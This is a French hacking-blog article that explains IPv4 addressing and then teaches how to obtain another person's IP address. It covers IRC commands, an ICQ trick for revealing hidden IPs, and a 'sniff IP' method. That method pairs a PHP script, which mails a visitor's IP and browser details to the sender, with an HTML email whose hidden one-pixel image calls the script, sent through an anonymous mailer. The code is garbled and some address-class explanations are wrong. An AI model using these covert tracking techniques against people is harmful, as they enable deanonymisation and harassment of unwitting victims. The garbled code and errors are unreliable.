Tout sur les adresses IP, et comment les récupérer.


Tout sur les adresses IP, et comment les récupérer.

Une adresse IP (Internet Protocol) est un identifiant unique, qui d’un point de vue conceptuel est similaire à un numéro de téléphone, ou une adresse postale. Cette adresse est utilisée pour identifier un composant (en général un ordinateur, mais aussi un routeur, une imprimante, un scanner, etc…) sur un réseau local, un réseau étendu ou sur Internet. Un composant doit absolument posséder au moins une adresse IP pour être accessible.

Sur le net, les ordinateurs communiquent entre eux grâce, notamment, au protocole IP (Internet Protocol), qui utilise des “adresses IP”, composées de 4 octets, nombres entiers entre 0 et 255, qu’on note xx.xxx.xx.xxx. Par exemple, 172.54.182.112, ou encore 34.56.123.12, etc… C’est l’équivalent de l’adresse postale d’un particulier ou d’une entreprise. Ces adresses servent aux réseaux pour communiquer entre eux, chaque machine possède donc sa propre adresse IP.

L’ICANN (Internet Corporation for Assigned Names and Numbers) s’occupe de distribuer les adresses IP publiques, c’est à dire toutes adresses IP des ordinateurs connectés au réseau public internet.

Une adresse IP, est donc généralement noter sous forme de 4 nombre, entiers, séparés par un point. Une adresse IP est une adresse 32 bits. L’adresse IP n’est pas totalement créer aléatoirement, on y distingue deux parties:

Les nombres à gauche désigne le réseau et sont appelés ID de réseau (netID en anglais),
Les nombres de droite désignent les ordinateurs de ce réseau, et sont appelés ID d’hôte (host-ID en anglais).

Imaginons donc un réseau noté 83.0.0.0 . Les ordinateurs de ce réseau pourront avoir des IP allant de 83.0.0.1 à 83.255.255.254. Il faut donc distribuer les numéros, en faisant en sorte qu’il y ait une organisation dans la hiérarchie des ordinateurs du réseau et des serveurs.

Ainsi, plus le nombre de bits réservé au réseau est petit, plus celui-ci peut contenir d’ordinateurs.

En effet, un réseau noté 102.0.0.0 pourra avoir des ordinateurs dont l’adresse IP peut varier entre 102.0.0.1 et 102.255.255.254, soit 16777214 possibilités, tandis qu’un réseau noté 164.26.0.0 ne pourra contenir que des ordinateurs dont l’adresse IP sera comprise entre 164.26.0.1 et 164.26.255.254, soit 65534 possibilités, c’est la notion de classe d’adresse IP. Certes, le nombre d’adresses IP disponible reste encore très grand, mais le réseau possédant l’adresse IP 102.0.0.0, sera tout de même avantagé.

Les adresses IP sont donc réparties en classes, selon le nombre d’octets qui représentent le réseau:

Classe A :

Dans les adresses IP de classe A, seul le premier octet représente le réseau. Le premier bit, celui de gauche est à zéro, ce qui signifie qu’il y a 128 possibilités. Toutefois, il n’y a pas de réseau 0 (bits valant 00000000), et le nombre 127 est réservé pour désigner la machine.

Les réseaux disponibles en classe A sont donc les réseaux allant de 1.0.0.0 à 126.0.0.0 (les derniers octets étant des zéros, ils indiquent qu’il s’agit bien de réseaux et non d’ordinateurs)

Les trois octets de droite représentent les ordinateurs du réseaux, le réseau peut donc posséder un nombre utilisateurs de 16777214 ordinateurs.

Voici un Schéma représentant les adresses IP de classe A:

xxxxxxx xxxxxxxx. xxxxxxxx xxxxxxxx
I_______I I_______________________________________________I
Réseau Ordinateurs

Classe B, soit :

Dans une adresse IP de classe B, les deux premiers octets représentent le réseau, alors que pour la classe A, seul le premier octet représente le réseau. Les deux premiers bits sont 1 et 0, ce qui signifie qu’il y a 16384 réseaux possibles. Les réseaux disponibles en classe B sont donc les réseaux allant de 128.0.0.0 à 191.255.0.0 Les deux octets de droite représentent les ordinateurs du réseau. Le réseau peut donc contenir un nombre d’ordinateurs égal à 65534 ordinateurs. Voici un schéma représentant les adresses IP de classe B:

xxxxxx xxxxxxxx xxxxxxxx xxxxxxxx
I_____________________I I___________________________I
Réseau Ordinateurs

Classe C :

Dans une adresse IP de classe C, les trois premiers octets représentent le réseau. Les trois premiers bits sont 1,1 et 0, ce qui signifie qu’il y a 2097152 réseaux possibles. Les réseaux disponibles en classe C sont donc les réseaux allant de 192.0.0.0 à 223.255.255.0

Voici un schéma représentant les adresses IP de classe C:

xxxxxx xxxxxxxx xxxxxxxx xxxxxxxx
I________________________________________I I_________I
Réseau Ordinateurs

Il existe aussi les classes D et E, selon le même principe, il y a chaque fois un octet de plus destine au réseau.

Le but de la division des adresses IP en plusieurs classes est de faciliter la recherche d’un ordinateur sur un réseau. En effet avec cette notation il est possible de rechercher dans un premier temps, le réseau que ou l’on désire aller, un ordinateur sur celui-ci. Ainsi l’attribution des adresses IP se fait selon la taille du réseau. Les adresses de classe A sont donc réservées aux plus grands réseaux, tandis que les adresses de classe C seront attribuer à des petits réseaux.

Souvent, dans les entreprises, il arrive qu’un seul ordinateur soit relié à internet, et c’est par son intermédiaire que les autres ordinateurs du réseau accèdent à internet. L’on parle dans ce cas la généralement de proxy ou passerelle, ou même parfois d’un routeur. Dans ce cas là, seul une adresse IP reliée à internet est nécessaire. Mais les ordinateurs du réseau doivent tout de même, afin de pouvoir communiquer entre eux, posséder une adresse IP pour pouvoir communiquer entre eux dans le réseau.

Dans ce but, l’ICANN a réservé quelques adresses IP dans chaque classe pour permettre a chaque ordinateur d’un réseau local relier a internet par une passerelle de posséder une adresse IP sans risquer de créer des conflits d’adresses IP sur le réseau.

Les quelques adresses réservées sont les suivantes:

Classe A : 10.0.0.1 à 10.255.255.254, elles permettent la création de vastes réseaux privés comprenant des milliers d’ordinateurs.
Classe B : 172.16.0.1 à 172.31.255.254, elles permettent de créer des réseaux privés de taille moyenne.
Classe C : 192.168.0.1 à 192.168.0.254, pour la mise en place de petits réseaux privés, le plus souvent pour les particuliers (exemple : Reseau LAN).

Voyons désormais comment récupérer l’adresse IP de quelqu’un.

Commençons d’abord par la récupération sur les chats, comme l’IRC, ICQ ou Messenger.

Sur les chats IRC:

Tout d’abord, la plus basique, tapez simplement

/dns pseudo

exemple :

/dns DarkZoom

pour récupérer l’IP de DarkZoom.

Autre commande basique,

/whois pseudo

La commande a pour effet de renvoyer le nom de la machine, et d’autres petites infos plus ou moins utiles, tirées du whois bien sur.

Enfin, beaucoup de serveurs, comme “voilà” par exemple, bloquent les commandes citées ci dessus. Mais heureusement, une dernière commande existe,

/who pseudo %in

. Cette commande est la plus utile, car peu de serveurs la bloque.

Sur ICQ:

Voyons d’abord la première méthode, la plus ancienne. Cliquez sur le pseudo de la personne dont vous voulez récupérer l’IP, puis sur info. Si l’utilisateur a caché son adresse IP, il y aura marqué N/A dans la place prévue à cet effet.

Mais ne vous inquiétez pas, si l’IP est cachée, mettez votre ICQ sur ‘offline’ puis fermez la fenêtre info. Retournez ensuite dans la page infos de la même manière que précédemment, et cette fois, normalement l’IP s’affiche !

Autre solution, si la victime a une version inférieure à la 2000b, il suffit d’ouvrir une fenêtre MS-DOS, et d’y taper “netstat”. Vous trouverez toutes les connexions ouvertes sur votre pc. Avec ICQ, si vous avez parler à votre victime, son ip y figurera

Enfin, il existe un programme, ICQ/IP. ICQ/IP est un complément à ICQ. Installé dans la barre des tâches, ce petit logiciel écrit dans votre fichier local Hosts, l’adresse IP des utilisateurs en ligne figurant dans votre liste de contacts. Ces adresses IP qui sont dynamiques, apparaissent alors comme étant statiques. Une option permet via un simple clic avec le bouton gauche de la souris sur l’icône d’ICQ/IP, d’interrompre ou de laisser passer le son. Simple d’emploi, ICQ/IP présente en plus l’avantage d’être gratuit. Ce programme est donc disponible dans notre partie download.

Avoir l’adresse IP de ses visiteurs

Pour ceux qui possèdent un site web, il y a une solution très simple pour connaître l’IP de ses visiteurs.

Grâce au PHP, il vous suffit de mettre la commande suivante dans un fichier php :

<$_SERVER[‘REMOTE_ADDR’] exemple: >?
echo « Votre adresse IP est : « .$_SERVER[‘REMOTE_ADDR’];
>?

ce qui donnera: votre IP est 211.68.7.36 (Fausse IP, bien sur…)

Récupérer l’IP de quelqu’un en lui envoyant un mail

Voyons désormais la méthode appelé “sniff IP”.

L’idée est d’envoyer a la victime, un mail qui obligera son ordinateur a aller chercher une soit disant image. L’image sera en réalité une page .php, qui permettra d’envoyer, par mail, son IP au hacker.

Voyons tout d’abord le script:

sniffIP.php

<!–?php <html–>
Sniff IP By Hackropole

<!–?php $hacker = $a; $pigeon = $b; $fp = fopen(« compteur.txt », »r+ »); // 1.On ouvre le fichier en lecture/écriture $rap = fgets($fp,11); // 2.On récupère le nombre dans le fichier $rap++; // 3.On incrémente le nombre de visites(+1) fseek($fp,0); // 4.On se place en début de fichier fputs($fp,$rap); // 5.On écrit dans le fichier le nouveau nb fclose($fp); $ip = $_SERVER[‘REMOTE_ADDR’]; $nav = $_SERVER[‘HTTP_USER_AGENT’]; $uri = $_SERVER[‘REQUEST_URI’]; $date = date(jj-mm-yyyy); $time = time(hh:mm); $email = $hacker; $sujet = « Sniff IP de « .$pigeon; $message = « Rapport n°: 000″.$rap. » Creation date / time: « .$date. » / « .$time. » Provider: http://sisat.free.fr Provider description: Le pole des accros de hacking. Bonjour, « .$hacker. » « ; $message .= « Vous avez demandé un Sniff IP de « .$pigeon. » . Voici les informations que nous avons pu obtenir: IP: « .$ip. » Navigateur: « .$nav. » Adresse de provenance: « .$uri. » Données du « .$date. » a « .$time. » . Informations fournies par http://www.hackropole.fr.st =-_-= Le pole des accros de hacking =-_-= Script Sniff IP Par [S!S@T]SharkoZ »; $headers=  » From: « .$pigeon. » « ; mail($email,$sujet,$message,$headers); ?–>

?&gt;

Une fois que la page a été uploadée sur un serveur, il faut envoyer le code ci dessous a la victime dont l’IP veut être récupérée.

Mais, pour ceci, il faut pouvoir envoyer le mail d’une boite exécutant le HTML. En effet, beaucoup de boites mail bloquent l’exécution du code HTML, et l’affichent comme un simple texte. Pour résoudre ce problème, nous avons créer notre mailer anonyme, disponible dans les services gratuits. Grâce a lui, le code HTML inclus dans un message sera exécuter, et non retranscrit en texte.

Voici donc le code a inclure dans le message:

PHP :

<!–?php Voila une petite image ! <br ?–> J’espere qu’elle te plaira… <img src= »http://www.votre-site.com/?a=mail-hacker@provider.com&amp;b=mail-victime@provider.com » alt= » » width= »1″ height= »1″ />

Remplacez donc bien sur http://www.votre-site.com par l’adresse du serveur ou a été uplodé le code php, puis mail-hacker@provider.com par l’adresse d’envoi souhaitée, et mail-victime@provider.com par l’adresse de la victime.

Obtenir l’IP d’un site

Afin d’obtenir l’IP d’un site, tapez

ping http://www.site.com

dans la commande MS-DOS (demarrer ⇒ executer ⇒ cmd)

Récupérer son propre IP

Pour cela, vous pouvez utiliser la méthode citée pour récupérer l’IP d’un visiteur sur votre site web, ou bien, sous Windows XP, allez dans demarrer ⇒ executer ⇒ cmd ⇒ et tapez “ipconfig”

Voila, vous connaissez désormais les bases concernant les adresses IP, et comment les récupérer.

Share and Enjoy

  • Facebook
  • Twitter
  • Google Plus
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

HackNewGen

Passionné de l'informatique et du Hacking. Créateur du site HackNewGen.

You may also like...

Creampie